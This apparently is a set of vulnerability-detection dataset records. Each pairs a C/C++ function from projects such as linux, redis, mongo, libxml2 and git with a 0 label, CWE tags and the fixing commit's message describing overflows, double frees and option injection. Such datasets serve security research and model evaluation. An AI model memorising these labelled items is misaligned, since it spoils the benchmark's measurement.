static int cpu_clock_sample_group_locked(unsigned int clock_idx,
struct task_struct *p,
union cpu_time_count *cpu)
{
struct task_struct *t = p;
switch (clock_idx) {
default:
return -EINVAL;
case CPUCLOCK_PROF:
cpu->cpu = cputime_add(p->signal->utime, p->signal->stime);
do {
cpu->cpu = cputime_add(cpu->cpu, prof_ticks(t));
t = next_thread(t);
} while (t != p);
break;
case CPUCLOCK_VIRT:
cpu->cpu = p->signal->utime;
do {
cpu->cpu = cputime_add(cpu->cpu, virt_ticks(t));
t = next_thread(t);
} while (t != p);
break;
case CPUCLOCK_SCHED:
cpu->sched = p->signal->sum_sched_runtime;
/* Add in each other live thread. */
while ((t = next_thread(t)) != p) {
cpu->sched += t->se.sum_exec_runtime;
}
cpu->sched += sched_ns(p);
break;
}
return 0;
}
| 0 |
[
"CWE-189"
] |
linux
|
f8bd2258e2d520dff28c855658bd24bdafb5102d
| 315,888,551,872,965,960,000,000,000,000,000,000,000 | 33 |
remove div_long_long_rem
x86 is the only arch right now which provides an optimized div_long_long_rem,
and it has the downside that one has to be very careful that
the divide doesn't overflow.
The API is a little awkward, as the arguments for the unsigned divide are
signed. The signed version also doesn't handle a negative divisor and
produces worse code on 64bit archs.
There is little incentive to keep this API alive, so this converts the few
users to the new API.
Signed-off-by: Roman Zippel <[email protected]>
Cc: Ralf Baechle <[email protected]>
Cc: Ingo Molnar <[email protected]>
Cc: Thomas Gleixner <[email protected]>
Cc: john stultz <[email protected]>
Cc: Christoph Lameter <[email protected]>
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
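The interface being removed combined a 64-bit dividend, a 32-bit divisor, and an out-parameter for the remainder, with the hidden requirement that the quotient fit in 32 bits. Ordinary 64-bit division has no such trap; the helper below is a hedged illustration in portable C, not the kernel's replacement helpers (div_u64() and friends):

```c
#include <stdint.h>
#include <stdio.h>

/* Plain 64-bit divide with remainder: the quotient is not forced to fit in
 * 32 bits, so there is nothing to "be very careful" about.  The divisor must
 * be non-zero. */
static uint64_t div64_with_rem(uint64_t dividend, uint32_t divisor,
                               uint32_t *remainder)
{
    *remainder = (uint32_t)(dividend % divisor);
    return dividend / divisor;
}

int main(void)
{
    uint32_t rem;
    uint64_t q = div64_with_rem(10000000000ULL, 3, &rem);
    printf("q=%llu rem=%u\n", (unsigned long long)q, rem);
    return 0;
}
```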
RegexMatchExpression::RegexMatchExpression(StringData path, const BSONElement& e)
: LeafMatchExpression(REGEX, path),
_regex(e.regex()),
_flags(e.regexFlags()),
_re(new pcrecpp::RE(_regex.c_str(), regex_util::flagsToPcreOptions(_flags, true))) {
uassert(ErrorCodes::BadValue, "regex not a regex", e.type() == RegEx);
_init();
}
| 0 |
[
"CWE-190"
] |
mongo
|
21d8699ed6c517b45e1613e20231cd8eba894985
| 214,354,002,941,884,180,000,000,000,000,000,000,000 | 8 |
SERVER-43699 $mod should not overflow for large negative values
|
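The overflow class behind SERVER-43699 is the usual one: negating, taking the absolute value of, or dividing the most negative 64-bit integer by -1 is undefined behavior in C/C++. A small hedged illustration of the guard, not MongoDB's actual $mod implementation:

```c
#include <stdint.h>
#include <stdio.h>

/* Returns 0 and writes the result on success, -1 when the operation is
 * rejected (division by zero). */
static int checked_mod(int64_t value, int64_t divisor, int64_t *out)
{
    if (divisor == 0)
        return -1;
    /* INT64_MIN % -1 is the remaining trap: the intermediate quotient
     * INT64_MIN / -1 is not representable, so both / and % are undefined.
     * Mathematically the remainder is 0, so answer that directly. */
    if (value == INT64_MIN && divisor == -1) {
        *out = 0;
        return 0;
    }
    *out = value % divisor;
    return 0;
}

int main(void)
{
    int64_t r;
    if (checked_mod(INT64_MIN, -1, &r) == 0)
        printf("INT64_MIN mod -1 = %lld (no overflow)\n", (long long)r);
    return 0;
}
```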
static void rtrs_clt_init_req(struct rtrs_clt_io_req *req,
struct rtrs_clt_path *clt_path,
void (*conf)(void *priv, int errno),
struct rtrs_permit *permit, void *priv,
const struct kvec *vec, size_t usr_len,
struct scatterlist *sg, size_t sg_cnt,
size_t data_len, int dir)
{
struct iov_iter iter;
size_t len;
req->permit = permit;
req->in_use = true;
req->usr_len = usr_len;
req->data_len = data_len;
req->sglist = sg;
req->sg_cnt = sg_cnt;
req->priv = priv;
req->dir = dir;
req->con = rtrs_permit_to_clt_con(clt_path, permit);
req->conf = conf;
req->need_inv = false;
req->need_inv_comp = false;
req->inv_errno = 0;
refcount_set(&req->ref, 1);
req->mp_policy = clt_path->clt->mp_policy;
iov_iter_kvec(&iter, READ, vec, 1, usr_len);
len = _copy_from_iter(req->iu->buf, usr_len, &iter);
WARN_ON(len != usr_len);
reinit_completion(&req->inv_comp);
}
| 0 |
[
"CWE-415"
] |
linux
|
8700af2cc18c919b2a83e74e0479038fd113c15d
| 228,209,813,768,828,250,000,000,000,000,000,000,000 | 33 |
RDMA/rtrs-clt: Fix possible double free in error case
Callback function rtrs_clt_dev_release() for put_device() calls kfree(clt)
to free memory. We shouldn't call kfree(clt) again, and we can't use the
clt after kfree too.
Replace device_register() with device_initialize() and device_add() so that
dev_set_name can() be used appropriately.
Move mutex_destroy() to the release function so it can be called in
the alloc_clt err path.
Fixes: eab098246625 ("RDMA/rtrs-clt: Refactor the failure cases in alloc_clt")
Link: https://lore.kernel.org/r/[email protected]
Reported-by: Miaoqian Lin <[email protected]>
Signed-off-by: Md Haris Iqbal <[email protected]>
Reviewed-by: Jack Wang <[email protected]>
Signed-off-by: Jason Gunthorpe <[email protected]>
|
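The rule the rtrs patch enforces (once an object's release callback owns the final kfree(), error paths must drop their reference instead of freeing directly, which is what the device_initialize()/device_add() split makes possible) can be sketched outside the kernel as follows. The obj_* names are hypothetical and only mirror that shape:

```c
#include <stdio.h>
#include <stdlib.h>

struct obj {
    int refcount;
    void (*release)(struct obj *);   /* owns the one and only free() */
};

static void obj_release(struct obj *o) { free(o); }

/* Step 1: initialize.  From this point on, all cleanup goes through obj_put(). */
static void obj_initialize(struct obj *o)
{
    o->refcount = 1;
    o->release = obj_release;
}

static void obj_put(struct obj *o)
{
    if (--o->refcount == 0)
        o->release(o);
}

/* Step 2: "add" may fail; the caller recovers with obj_put(), never free(). */
static int obj_add(struct obj *o)
{
    (void)o;
    return -1;                       /* pretend registration failed */
}

int main(void)
{
    struct obj *o = malloc(sizeof(*o));
    if (!o)
        return 1;
    obj_initialize(o);
    if (obj_add(o) != 0) {
        obj_put(o);   /* release() frees exactly once */
        /* calling free(o) here as well would be the double free the patch removes */
        return 1;
    }
    obj_put(o);
    return 0;
}
```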
bool WebSocketProtocol<isServer>::handleFragment(char *data, size_t length, unsigned int remainingBytes, int opCode, bool fin, void *user) {
uS::Socket s((uv_poll_t *) user);
typename WebSocket<isServer>::Data *webSocketData = (typename WebSocket<isServer>::Data *) s.getSocketData();
if (opCode < 3) {
if (!remainingBytes && fin && !webSocketData->fragmentBuffer.length()) {
if (webSocketData->compressionStatus == WebSocket<isServer>::Data::CompressionStatus::COMPRESSED_FRAME) {
webSocketData->compressionStatus = WebSocket<isServer>::Data::CompressionStatus::ENABLED;
Hub *hub = ((Group<isServer> *) s.getSocketData()->nodeData)->hub;
data = hub->inflate(data, length);
if (!data) {
forceClose(user);
return true;
}
}
if (opCode == 1 && !isValidUtf8((unsigned char *) data, length)) {
forceClose(user);
return true;
}
((Group<isServer> *) s.getSocketData()->nodeData)->messageHandler(WebSocket<isServer>(s), data, length, (OpCode) opCode);
if (s.isClosed() || s.isShuttingDown()) {
return true;
}
} else {
webSocketData->fragmentBuffer.append(data, length);
if (!remainingBytes && fin) {
length = webSocketData->fragmentBuffer.length();
if (webSocketData->compressionStatus == WebSocket<isServer>::Data::CompressionStatus::COMPRESSED_FRAME) {
webSocketData->compressionStatus = WebSocket<isServer>::Data::CompressionStatus::ENABLED;
Hub *hub = ((Group<isServer> *) s.getSocketData()->nodeData)->hub;
webSocketData->fragmentBuffer.append("....");
data = hub->inflate((char *) webSocketData->fragmentBuffer.data(), length);
if (!data) {
forceClose(user);
return true;
}
} else {
data = (char *) webSocketData->fragmentBuffer.data();
}
if (opCode == 1 && !isValidUtf8((unsigned char *) data, length)) {
forceClose(user);
return true;
}
((Group<isServer> *) s.getSocketData()->nodeData)->messageHandler(WebSocket<isServer>(s), data, length, (OpCode) opCode);
if (s.isClosed() || s.isShuttingDown()) {
return true;
}
webSocketData->fragmentBuffer.clear();
}
}
} else {
// todo: we don't need to buffer up in most cases!
webSocketData->controlBuffer.append(data, length);
if (!remainingBytes && fin) {
if (opCode == CLOSE) {
CloseFrame closeFrame = parseClosePayload((char *) webSocketData->controlBuffer.data(), webSocketData->controlBuffer.length());
WebSocket<isServer>(s).close(closeFrame.code, closeFrame.message, closeFrame.length);
return true;
} else {
if (opCode == PING) {
WebSocket<isServer>(s).send(webSocketData->controlBuffer.data(), webSocketData->controlBuffer.length(), (OpCode) OpCode::PONG);
((Group<isServer> *) s.getSocketData()->nodeData)->pingHandler(WebSocket<isServer>(s), (char *) webSocketData->controlBuffer.data(), webSocketData->controlBuffer.length());
if (s.isClosed() || s.isShuttingDown()) {
return true;
}
} else if (opCode == PONG) {
((Group<isServer> *) s.getSocketData()->nodeData)->pongHandler(WebSocket<isServer>(s), (char *) webSocketData->controlBuffer.data(), webSocketData->controlBuffer.length());
if (s.isClosed() || s.isShuttingDown()) {
return true;
}
}
}
webSocketData->controlBuffer.clear();
}
}
return false;
}
| 0 |
[
"CWE-20"
] |
uWebSockets
|
37deefd01f0875e133ea967122e3a5e421b8fcd9
| 100,056,682,367,568,210,000,000,000,000,000,000,000 | 82 |
Don't inflate more than ~16mb, drop connection on inflate error
|
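The hardening in the uWebSockets commit (cap the decompressed size at roughly 16 MB and drop the connection when inflate fails) looks broadly like the zlib-based sketch below. The exact limit, the one-shot output buffer and the error policy are assumptions for illustration; the library's own Hub::inflate() differs in detail:

```c
#include <stdlib.h>
#include <string.h>
#include <zlib.h>

#define MAX_INFLATED (16u * 1024u * 1024u)   /* assumed cap of roughly 16 MB */

/* Inflate 'in' (a raw deflate stream, as permessage-deflate uses) into a
 * malloc'ed buffer.  Returns NULL on inflate error or when the output would
 * exceed MAX_INFLATED; the caller treats NULL as "drop the connection".
 * A single fixed-size output buffer keeps the sketch short; real code would
 * grow the buffer up to the cap instead. */
static unsigned char *inflate_capped(const unsigned char *in, size_t in_len,
                                     size_t *out_len)
{
    unsigned char *out = malloc(MAX_INFLATED);
    if (!out)
        return NULL;

    z_stream zs;
    memset(&zs, 0, sizeof(zs));
    if (inflateInit2(&zs, -15) != Z_OK) {    /* -15: raw deflate, no header */
        free(out);
        return NULL;
    }
    zs.next_in = (Bytef *)in;
    zs.avail_in = (uInt)in_len;
    zs.next_out = out;
    zs.avail_out = MAX_INFLATED;

    int ret = inflate(&zs, Z_SYNC_FLUSH);
    size_t produced = MAX_INFLATED - zs.avail_out;
    /* Success: either the stream ended, or all input was consumed and the
     * output buffer did not fill up (i.e. the cap was not hit). */
    int ok = (ret == Z_STREAM_END) ||
             (ret == Z_OK && zs.avail_in == 0 && zs.avail_out > 0);
    inflateEnd(&zs);

    if (!ok) {
        free(out);
        return NULL;
    }
    *out_len = produced;
    return out;
}
```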
void comps_objmrtree_destroy_u(COMPS_Object *obj) {
comps_objmrtree_destroy((COMPS_ObjMRTree*)obj);
}
| 0 |
[
"CWE-416",
"CWE-862"
] |
libcomps
|
e3a5d056633677959ad924a51758876d415e7046
| 36,037,494,143,965,275,000,000,000,000,000,000,000 | 3 |
Fix UAF in comps_objmrtree_unite function
The added field is not used at all in many places and it is probably the
left-over of some copy-paste.
|
void *zmalloc_no_tcache(size_t size) {
ASSERT_NO_SIZE_OVERFLOW(size);
void *ptr = mallocx(size+PREFIX_SIZE, MALLOCX_TCACHE_NONE);
if (!ptr) zmalloc_oom_handler(size);
update_zmalloc_stat_alloc(zmalloc_size(ptr));
return ptr;
}
| 0 |
[
"CWE-190"
] |
redis
|
d32f2e9999ce003bad0bd2c3bca29f64dcce4433
| 275,068,707,131,074,450,000,000,000,000,000,000,000 | 7 |
Fix integer overflow (CVE-2021-21309). (#8522)
On 32-bit systems, setting the proto-max-bulk-len config parameter to a high value may result in integer overflow and a subsequent heap overflow when parsing an input bulk (CVE-2021-21309).
This fix has two parts:
Set a reasonable limit to the config parameter.
Add additional checks to prevent the problem in other potential but unknown code paths.
|
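The ASSERT_NO_SIZE_OVERFLOW() guard visible in zmalloc_no_tcache() reflects the two-part fix described above: bound the configurable size and make sure adding the allocator prefix cannot wrap size_t. A minimal hedged C version of such a check, with placeholder values rather than Redis's exact PREFIX_SIZE and limit:

```c
#include <stdint.h>
#include <stdlib.h>

#define PREFIX_SIZE sizeof(size_t)                  /* placeholder value */
#define PROTO_MAX_BULK_LEN (512u * 1024u * 1024u)   /* assumed sane upper bound */

/* Reject sizes beyond the configured protocol limit, and sizes that would
 * wrap size_t once the allocator prefix is added, before calling malloc. */
static void *safe_alloc(size_t size)
{
    if (size > PROTO_MAX_BULK_LEN)          /* part 1: reasonable config limit */
        return NULL;
    if (size > SIZE_MAX - PREFIX_SIZE)      /* part 2: no integer wraparound  */
        return NULL;
    return malloc(size + PREFIX_SIZE);
}
```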
ofputil_append_ipfix_stat(struct ovs_list *replies,
const struct ofputil_ipfix_stats *ois)
{
struct nx_ipfix_stats_reply *reply = ofpmp_append(replies, sizeof *reply);
ofputil_ipfix_stats_to_reply(ois, reply);
}
| 0 |
[
"CWE-772"
] |
ovs
|
77ad4225d125030420d897c873e4734ac708c66b
| 55,978,810,142,258,200,000,000,000,000,000,000,000 | 6 |
ofp-util: Fix memory leaks on error cases in ofputil_decode_group_mod().
Found by libFuzzer.
Reported-by: Bhargava Shastry <[email protected]>
Signed-off-by: Ben Pfaff <[email protected]>
Acked-by: Justin Pettit <[email protected]>
|
xmlDictCreate(void) {
xmlDictPtr dict;
if (!xmlDictInitialized)
if (!__xmlInitializeDict())
return(NULL);
#ifdef DICT_DEBUG_PATTERNS
fprintf(stderr, "C");
#endif
dict = xmlMalloc(sizeof(xmlDict));
if (dict) {
dict->ref_counter = 1;
dict->limit = 0;
dict->size = MIN_DICT_SIZE;
dict->nbElems = 0;
dict->dict = xmlMalloc(MIN_DICT_SIZE * sizeof(xmlDictEntry));
dict->strings = NULL;
dict->subdict = NULL;
if (dict->dict) {
memset(dict->dict, 0, MIN_DICT_SIZE * sizeof(xmlDictEntry));
#ifdef DICT_RANDOMIZATION
dict->seed = __xmlRandom();
#else
dict->seed = 0;
#endif
return(dict);
}
xmlFree(dict);
}
return(NULL);
}
| 0 |
[
"CWE-119"
] |
libxml2
|
6360a31a84efe69d155ed96306b9a931a40beab9
| 199,476,079,647,907,450,000,000,000,000,000,000,000 | 34 |
CVE-2015-7497 Avoid an heap buffer overflow in xmlDictComputeFastQKey
For https://bugzilla.gnome.org/show_bug.cgi?id=756528
It was possible to hit a negative offset in the name indexing
used to randomize the dictionary key generation
Reported and fix provided by David Drysdale @ Google
|
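The CVE-2015-7497 note says the fast QName key computation could index a name with a negative offset. The generic rule is that any access of the form buf[len - k] must be preceded by a check that len >= k; the sketch below shows only that pattern and is unrelated to libxml2's actual hashing:

```c
#include <stddef.h>

/* Mix the last up-to-three bytes of 'name' into a key; every name[len - k]
 * access is guarded by a len >= k check so the offset can never go negative
 * (or, with size_t, wrap around). */
static unsigned long tail_key(const unsigned char *name, size_t len,
                              unsigned long seed)
{
    unsigned long key = seed;
    if (name == NULL || len == 0)
        return key;
    key = key * 31 + name[len - 1];
    if (len >= 2)
        key = key * 31 + name[len - 2];
    if (len >= 3)
        key = key * 31 + name[len - 3];
    return key;
}
```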
static int __tipc_nl_node_flush_key(struct sk_buff *skb,
struct genl_info *info)
{
struct net *net = sock_net(skb->sk);
struct tipc_net *tn = tipc_net(net);
struct tipc_node *n;
tipc_crypto_key_flush(tn->crypto_tx);
rcu_read_lock();
list_for_each_entry_rcu(n, &tn->node_list, list)
tipc_crypto_key_flush(n->crypto_rx);
rcu_read_unlock();
return 0;
}
| 0 |
[] |
linux
|
0217ed2848e8538bcf9172d97ed2eeb4a26041bb
| 1,070,313,887,725,001,600,000,000,000,000,000,000 | 15 |
tipc: better validate user input in tipc_nl_retrieve_key()
Before calling tipc_aead_key_size(ptr), we need to ensure
we have enough data to dereference ptr->keylen.
We probably also want to make sure tipc_aead_key_size()
won't overflow with malicious ptr->keylen values.
Syzbot reported:
BUG: KMSAN: uninit-value in __tipc_nl_node_set_key net/tipc/node.c:2971 [inline]
BUG: KMSAN: uninit-value in tipc_nl_node_set_key+0x9bf/0x13b0 net/tipc/node.c:3023
CPU: 0 PID: 21060 Comm: syz-executor.5 Not tainted 5.11.0-rc7-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
Call Trace:
__dump_stack lib/dump_stack.c:79 [inline]
dump_stack+0x21c/0x280 lib/dump_stack.c:120
kmsan_report+0xfb/0x1e0 mm/kmsan/kmsan_report.c:118
__msan_warning+0x5f/0xa0 mm/kmsan/kmsan_instr.c:197
__tipc_nl_node_set_key net/tipc/node.c:2971 [inline]
tipc_nl_node_set_key+0x9bf/0x13b0 net/tipc/node.c:3023
genl_family_rcv_msg_doit net/netlink/genetlink.c:739 [inline]
genl_family_rcv_msg net/netlink/genetlink.c:783 [inline]
genl_rcv_msg+0x1319/0x1610 net/netlink/genetlink.c:800
netlink_rcv_skb+0x6fa/0x810 net/netlink/af_netlink.c:2494
genl_rcv+0x63/0x80 net/netlink/genetlink.c:811
netlink_unicast_kernel net/netlink/af_netlink.c:1304 [inline]
netlink_unicast+0x11d6/0x14a0 net/netlink/af_netlink.c:1330
netlink_sendmsg+0x1740/0x1840 net/netlink/af_netlink.c:1919
sock_sendmsg_nosec net/socket.c:652 [inline]
sock_sendmsg net/socket.c:672 [inline]
____sys_sendmsg+0xcfc/0x12f0 net/socket.c:2345
___sys_sendmsg net/socket.c:2399 [inline]
__sys_sendmsg+0x714/0x830 net/socket.c:2432
__compat_sys_sendmsg net/compat.c:347 [inline]
__do_compat_sys_sendmsg net/compat.c:354 [inline]
__se_compat_sys_sendmsg+0xa7/0xc0 net/compat.c:351
__ia32_compat_sys_sendmsg+0x4a/0x70 net/compat.c:351
do_syscall_32_irqs_on arch/x86/entry/common.c:79 [inline]
__do_fast_syscall_32+0x102/0x160 arch/x86/entry/common.c:141
do_fast_syscall_32+0x6a/0xc0 arch/x86/entry/common.c:166
do_SYSENTER_32+0x73/0x90 arch/x86/entry/common.c:209
entry_SYSENTER_compat_after_hwframe+0x4d/0x5c
RIP: 0023:0xf7f60549
Code: 03 74 c0 01 10 05 03 74 b8 01 10 06 03 74 b4 01 10 07 03 74 b0 01 10 08 03 74 d8 01 00 00 00 00 00 51 52 55 89 e5 0f 34 cd 80 <5d> 5a 59 c3 90 90 90 90 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00
RSP: 002b:00000000f555a5fc EFLAGS: 00000296 ORIG_RAX: 0000000000000172
RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 0000000020000200
RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Uninit was created at:
kmsan_save_stack_with_flags mm/kmsan/kmsan.c:121 [inline]
kmsan_internal_poison_shadow+0x5c/0xf0 mm/kmsan/kmsan.c:104
kmsan_slab_alloc+0x8d/0xe0 mm/kmsan/kmsan_hooks.c:76
slab_alloc_node mm/slub.c:2907 [inline]
__kmalloc_node_track_caller+0xa37/0x1430 mm/slub.c:4527
__kmalloc_reserve net/core/skbuff.c:142 [inline]
__alloc_skb+0x2f8/0xb30 net/core/skbuff.c:210
alloc_skb include/linux/skbuff.h:1099 [inline]
netlink_alloc_large_skb net/netlink/af_netlink.c:1176 [inline]
netlink_sendmsg+0xdbc/0x1840 net/netlink/af_netlink.c:1894
sock_sendmsg_nosec net/socket.c:652 [inline]
sock_sendmsg net/socket.c:672 [inline]
____sys_sendmsg+0xcfc/0x12f0 net/socket.c:2345
___sys_sendmsg net/socket.c:2399 [inline]
__sys_sendmsg+0x714/0x830 net/socket.c:2432
__compat_sys_sendmsg net/compat.c:347 [inline]
__do_compat_sys_sendmsg net/compat.c:354 [inline]
__se_compat_sys_sendmsg+0xa7/0xc0 net/compat.c:351
__ia32_compat_sys_sendmsg+0x4a/0x70 net/compat.c:351
do_syscall_32_irqs_on arch/x86/entry/common.c:79 [inline]
__do_fast_syscall_32+0x102/0x160 arch/x86/entry/common.c:141
do_fast_syscall_32+0x6a/0xc0 arch/x86/entry/common.c:166
do_SYSENTER_32+0x73/0x90 arch/x86/entry/common.c:209
entry_SYSENTER_compat_after_hwframe+0x4d/0x5c
Fixes: e1f32190cf7d ("tipc: add support for AEAD key setting via netlink")
Signed-off-by: Eric Dumazet <[email protected]>
Cc: Tuong Lien <[email protected]>
Cc: Jon Maloy <[email protected]>
Cc: Ying Xue <[email protected]>
Reported-by: syzbot <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
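The report above calls for two separate checks: that the received attribute is long enough to contain the keylen field before it is dereferenced, and that the total size computed from keylen cannot overflow. A hedged sketch of both checks on a TLV-style buffer, using a made-up layout rather than TIPC's struct tipc_aead_key:

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

struct aead_key_hdr {        /* illustrative layout, not TIPC's real struct */
    char     alg_name[32];
    uint32_t keylen;
    /* keylen bytes of key material follow */
};

/* Returns the total size of the key blob, or 0 if the buffer is too short to
 * even read keylen, if keylen is implausibly large, or if the size arithmetic
 * would overflow. */
static size_t aead_key_size_checked(const void *buf, size_t buf_len)
{
    struct aead_key_hdr hdr;

    if (buf_len < sizeof(hdr))                 /* check before dereferencing */
        return 0;
    memcpy(&hdr, buf, sizeof(hdr));            /* avoids unaligned reads     */

    if (hdr.keylen > 64)                       /* assumed sane maximum       */
        return 0;
    if (hdr.keylen > SIZE_MAX - sizeof(hdr))   /* no arithmetic overflow     */
        return 0;
    if (buf_len < sizeof(hdr) + hdr.keylen)    /* key material really there  */
        return 0;
    return sizeof(hdr) + hdr.keylen;
}
```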
int reset(void)
{
ptr[0]=ptr[1]=ptr[2]=ptr[3]=ptr[4]=ptr[5]=ptr[6]=ptr[7]=0;
return 0;
}
| 0 |
[
"CWE-416",
"CWE-703"
] |
server
|
08c7ab404f69d9c4ca6ca7a9cf7eec74c804f917
| 275,735,299,192,207,800,000,000,000,000,000,000,000 | 5 |
MDEV-24176 Server crashes after insert in the table with virtual
column generated using date_format() and if()
vcol_info->expr is allocated on expr_arena at parsing stage. Since
expr item is allocated on expr_arena all its containee items must be
allocated on expr_arena too. Otherwise fix_session_expr() will
encounter prematurely freed item.
When table is reopened from cache vcol_info contains stale
expression. We refresh expression via TABLE::vcol_fix_exprs() but
first we must prepare a proper context (Vcol_expr_context) which meets
some requirements:
1. As noted above expr update must be done on expr_arena as there may
be new items created. It was a bug in fix_session_expr_for_read() and
was just not reproduced because of no second refix. Now refix is done
for more cases so it does reproduce. Tests affected: vcol.binlog
2. Also name resolution context must be narrowed to the single table.
Tested by: vcol.update main.default vcol.vcol_syntax gcol.gcol_bugfixes
3. sql_mode must be clean and not fail expr update.
sql_mode such as MODE_NO_BACKSLASH_ESCAPES, MODE_NO_ZERO_IN_DATE, etc
must not affect vcol expression update. If the table was created
successfully any further evaluation must not fail. Tests affected:
main.func_like
Reviewed by: Sergei Golubchik <[email protected]>
|
static int ax88179_resume(struct usb_interface *intf)
{
struct usbnet *dev = usb_get_intfdata(intf);
u16 tmp16;
u8 tmp8;
usbnet_link_change(dev, 0, 0);
/* Power up ethernet PHY */
tmp16 = 0;
ax88179_write_cmd_nopm(dev, AX_ACCESS_MAC, AX_PHYPWR_RSTCTL,
2, 2, &tmp16);
udelay(1000);
tmp16 = AX_PHYPWR_RSTCTL_IPRL;
ax88179_write_cmd_nopm(dev, AX_ACCESS_MAC, AX_PHYPWR_RSTCTL,
2, 2, &tmp16);
msleep(200);
/* Ethernet PHY Auto Detach*/
ax88179_auto_detach(dev, 1);
/* Enable clock */
ax88179_read_cmd_nopm(dev, AX_ACCESS_MAC, AX_CLK_SELECT, 1, 1, &tmp8);
tmp8 |= AX_CLK_SELECT_ACS | AX_CLK_SELECT_BCS;
ax88179_write_cmd_nopm(dev, AX_ACCESS_MAC, AX_CLK_SELECT, 1, 1, &tmp8);
msleep(100);
/* Configure RX control register => start operation */
tmp16 = AX_RX_CTL_DROPCRCERR | AX_RX_CTL_IPE | AX_RX_CTL_START |
AX_RX_CTL_AP | AX_RX_CTL_AMALL | AX_RX_CTL_AB;
ax88179_write_cmd_nopm(dev, AX_ACCESS_MAC, AX_RX_CTL, 2, 2, &tmp16);
return usbnet_resume(intf);
}
| 0 |
[
"CWE-787"
] |
linux
|
57bc3d3ae8c14df3ceb4e17d26ddf9eeab304581
| 167,832,701,206,578,830,000,000,000,000,000,000,000 | 35 |
net: usb: ax88179_178a: Fix out-of-bounds accesses in RX fixup
ax88179_rx_fixup() contains several out-of-bounds accesses that can be
triggered by a malicious (or defective) USB device, in particular:
- The metadata array (hdr_off..hdr_off+2*pkt_cnt) can be out of bounds,
causing OOB reads and (on big-endian systems) OOB endianness flips.
- A packet can overlap the metadata array, causing a later OOB
endianness flip to corrupt data used by a cloned SKB that has already
been handed off into the network stack.
- A packet SKB can be constructed whose tail is far beyond its end,
causing out-of-bounds heap data to be considered part of the SKB's
data.
I have tested that this can be used by a malicious USB device to send a
bogus ICMPv6 Echo Request and receive an ICMPv6 Echo Reply in response
that contains random kernel heap data.
It's probably also possible to get OOB writes from this on a
little-endian system somehow - maybe by triggering skb_cow() via IP
options processing -, but I haven't tested that.
Fixes: e2ca90c276e1 ("ax88179_178a: ASIX AX88179_178A USB 3.0/2.0 to gigabit ethernet adapter driver")
Cc: [email protected]
Signed-off-by: Jann Horn <[email protected]>
Signed-off-by: Greg Kroah-Hartman <[email protected]>
|
static void warn_command_line_option(const char *var, const char *value)
{
warning(_("ignoring '%s' which may be interpreted as"
" a command-line option: %s"), var, value);
}
| 0 |
[
"CWE-88"
] |
git
|
f6adec4e329ef0e25e14c63b735a5956dc67b8bc
| 327,552,819,727,584,450,000,000,000,000,000,000,000 | 5 |
submodule-config: ban submodule urls that start with dash
The previous commit taught the submodule code to invoke our
"git clone $url $path" with a "--" separator so that we
aren't confused by urls or paths that start with dashes.
However, that's just one code path. It's not clear if there
are others, and it would be an easy mistake to add one in
the future. Moreover, even with the fix in the previous
commit, it's quite hard to actually do anything useful with
such an entry. Any url starting with a dash must fall into
one of three categories:
- it's meant as a file url, like "-path". But then any
clone is not going to have the matching path, since it's
by definition relative inside the newly created clone. If
you spell it as "./-path", the submodule code sees the
"/" and translates this to an absolute path, so it at
least works (assuming the receiver has the same
filesystem layout as you). But that trick does not apply
for a bare "-path".
- it's meant as an ssh url, like "-host:path". But this
already doesn't work, as we explicitly disallow ssh
hostnames that begin with a dash (to avoid option
injection against ssh).
- it's a remote-helper scheme, like "-scheme::data". This
_could_ work if the receiver bends over backwards and
creates a funny-named helper like "git-remote--scheme".
But normally there would not be any helper that matches.
Since such a url does not work today and is not likely to do
anything useful in the future, let's simply disallow them
entirely. That protects the existing "git clone" path (in a
belt-and-suspenders way), along with any others that might
exist.
Our tests cover two cases:
1. A file url with "./" continues to work, showing that
there's an escape hatch for people with truly silly
repo names.
2. A url starting with "-" is rejected.
Note that we expect case (2) to fail, but it would have done
so even without this commit, for the reasons given above.
So instead of just expecting failure, let's also check for
the magic word "ignoring" on stderr. That lets us know that
we failed for the right reason.
Signed-off-by: Jeff King <[email protected]>
Signed-off-by: Junio C Hamano <[email protected]>
|
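The policy the git change enforces is simple to state in code: a submodule URL may not begin with a dash, and the documented escape hatch for odd local names is to spell them as "./-path". A hedged sketch of that predicate, not git's actual check in submodule-config.c:

```c
#include <stdbool.h>
#include <stdio.h>

/* A URL starting with '-' could be taken for a command-line option by
 * "git clone $url"; refuse it outright.  "./-path" is still usable. */
static bool submodule_url_is_allowed(const char *url)
{
    return url != NULL && url[0] != '-';
}

int main(void)
{
    const char *samples[] = { "-path", "./-path", "https://example.com/repo.git" };
    for (size_t i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
        printf("%-30s %s\n", samples[i],
               submodule_url_is_allowed(samples[i]) ? "accepted" : "rejected");
    return 0;
}
```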
mrb_vm_define_module(mrb_state *mrb, mrb_value outer, mrb_sym id)
{
check_if_class_or_module(mrb, outer);
if (mrb_const_defined_at(mrb, outer, id)) {
mrb_value old = mrb_const_get(mrb, outer, id);
if (!mrb_module_p(old)) {
mrb_raisef(mrb, E_TYPE_ERROR, "%!v is not a module", old);
}
return mrb_class_ptr(old);
}
return define_module(mrb, id, mrb_class_ptr(outer));
}
| 0 |
[
"CWE-787"
] |
mruby
|
b1d0296a937fe278239bdfac840a3fd0e93b3ee9
| 186,461,784,160,360,100,000,000,000,000,000,000,000 | 13 |
class.c: clear method cache after `remove_method`.
|
spell_free_aff(afffile_T *aff)
{
hashtab_T *ht;
hashitem_T *hi;
int todo;
affheader_T *ah;
affentry_T *ae;
vim_free(aff->af_enc);
/* All this trouble to free the "ae_prog" items... */
for (ht = &aff->af_pref; ; ht = &aff->af_suff)
{
todo = (int)ht->ht_used;
for (hi = ht->ht_array; todo > 0; ++hi)
{
if (!HASHITEM_EMPTY(hi))
{
--todo;
ah = HI2AH(hi);
for (ae = ah->ah_first; ae != NULL; ae = ae->ae_next)
vim_regfree(ae->ae_prog);
}
}
if (ht == &aff->af_suff)
break;
}
hash_clear(&aff->af_pref);
hash_clear(&aff->af_suff);
